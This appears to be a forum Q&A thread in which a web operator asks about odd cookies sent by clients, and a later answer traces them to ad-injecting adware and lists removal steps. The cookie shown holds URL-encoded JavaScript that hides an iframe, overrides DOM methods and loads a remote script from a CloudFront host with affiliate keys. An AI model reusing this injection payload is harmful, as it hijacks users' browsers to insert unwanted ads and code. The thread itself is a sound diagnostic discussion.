1

Some clients send requests to our webapp with additional cookies like this:

vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false;  vidyk=1; svidyk=1; ykuid=tpvur0av71lvfcvbn4pz; ykoptout=false; _ga=GA1.2.633227847.1500039040; _gid=GA1.2.1587477355.1500039040; _gat_ga_ua2=1; _gat_ga%28'create'%2C'UA-93290101-3'%2C'auto'%2C%22ga_ua2%22%29%3Bga%28'ga_ua2.send'%2C'pageview'%29%3B!function%28%29%7Bfunction%20e%28e%2Ct%29%7Bvar%20d%3Ddocument.createElement%28%22iframe%22%29%3Bd.src%3D%22about%3Ablank%22%2Cd.style.display%3D%22none%22%2Cdocument.body.appendChild%28d%29%2CElement.prototype.appendChild%3Dd.contentWindow.Element.prototype.appendChild%2CElement.prototype.insertBefore%3Dd.contentWindow.Element.prototype.insertBefore%3Bvar%20n%3Ddocument.createElement%28%22script%22%29%3Bn.type%3D%22text%2Fjavascript%22%2Cn.async%3D!0%2Cn.src%3D%22%2F%2Fd323drta3nak2g.cloudfront.net%2Fv1%2Ftaas%3Fid%3D%22%2Be%2B%22%26api_key%3D45918e2d6de38b8deaf7927d277e58d5%26site_id%3D%22%2Bt%2B%22%26disclosure_text%3D%26disclosure_url%3Dhttps%253A%252F%252Fyieldkit.com%252Flegal-notes%252Fterms-of-service%252F%26yk_tag%3Db%22%2C%28document.getElementsByTagName%28%22head%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28n%29%7De%28%22se.prod%26pla%3D1%26si%3D1%26%22%2C%220c4d5f3a79914d97b6011efb4471a249%22%29%2Ce%28%22deals.prod%22%2C%22d7d224892cfe47c7b50aed3bb644057f%22%29%7D%28%29%3B%2F%2F=1;

Our application does not install such cookies. We used some external JavaScript, like Google Analytics, but none of those scripts is doing this. Our site is accessible only via HTTPS, so MITM request modification is unlikely.

We use WAF, these requests are blocked and clients are unhappy.

I suppose, some malicious browser extension is trying to exploit some popular web engine vulnerability.

Has anybody encountered anything like this? Any ideas on what is doing that?

P.S. URL decoded content of that cookie is javascript, that among other contains link to http://yieldkit.com/legal-notes/terms-of-service/, but they are probably just used by scammer to monetize their attacks.

neuro
  • 14,948
  • 3
  • 36
  • 59
Selivanov Pavel
  • 338
  • 2
  • 11
  • 25

1 Answers1

1

Found it. This malware does this: http://www.spyware-ru.com/udalit-r-srvtrck-com-reklamu-instruktsiya/ (article in russian) and translated with google translate.

Short summary:

There is a malware, that creates pop-up advertising windows with r.srvtrck.com site for Chrome, Firefox and IE. Also it may integrate advertising into web sites you open.

To remove it, you can use:

  • AdwCleaner program
  • Malwarebytes Anti-malware program
  • reset browser settings
  • clear *.lnk files from added site address after browser executable
  • AdGuard program to block advertising (I'd not recommend that, just clear your system and use AdBlock/uBlock)

It is recommended to check Windows Task Scheduler for unwanted tasks, that periodically start browser with malware site address.

Selivanov Pavel
  • 338
  • 2
  • 11
  • 25